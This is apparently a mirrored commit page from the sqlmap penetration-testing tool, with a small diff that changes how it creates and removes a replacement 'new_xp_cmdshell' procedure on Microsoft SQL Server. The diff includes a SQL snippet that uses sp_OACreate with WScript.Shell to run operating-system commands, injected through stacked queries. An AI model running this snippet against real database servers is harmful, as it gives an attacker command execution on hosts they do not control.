mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-16 19:40:37 +03:00
Minor update to cleanup properly new xp_cmdshell
This commit is contained in:
parent
d726050bc4
commit
bd99470a4a
|
@ -52,10 +52,9 @@ class Xp_cmdshell:
|
||||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||||
|
|
||||||
self._randStr = randomStr(lowercase=True)
|
self._randStr = randomStr(lowercase=True)
|
||||||
self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
|
self.xpCmdshellStr = "master..new_xp_cmdshell"
|
||||||
self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
|
|
||||||
|
|
||||||
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
|
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
|
||||||
|
|
||||||
if Backend.isVersionWithin(("2005", "2008")):
|
if Backend.isVersionWithin(("2005", "2008")):
|
||||||
cmd += ";RECONFIGURE WITH OVERRIDE"
|
cmd += ";RECONFIGURE WITH OVERRIDE"
|
||||||
|
|
|
@ -162,7 +162,7 @@ class Miscellaneous:
|
||||||
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
|
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL):
|
if Backend.isDbms(DBMS.MSSQL):
|
||||||
return
|
udfDict = {"master..new_xp_cmdshell": None}
|
||||||
|
|
||||||
if udfDict is None:
|
if udfDict is None:
|
||||||
udfDict = self.sysUdfs
|
udfDict = self.sysUdfs
|
||||||
|
|
|
@ -1,3 +1,3 @@
|
||||||
DECLARE @%RANDSTR% nvarchar(999);
|
DECLARE @%RANDSTR% nvarchar(999);
|
||||||
set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
|
set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
|
||||||
EXEC master..sp_executesql @%RANDSTR%
|
EXEC master..sp_executesql @%RANDSTR%
|
||||||
|
|
Loading…
Reference in New Issue
Block a user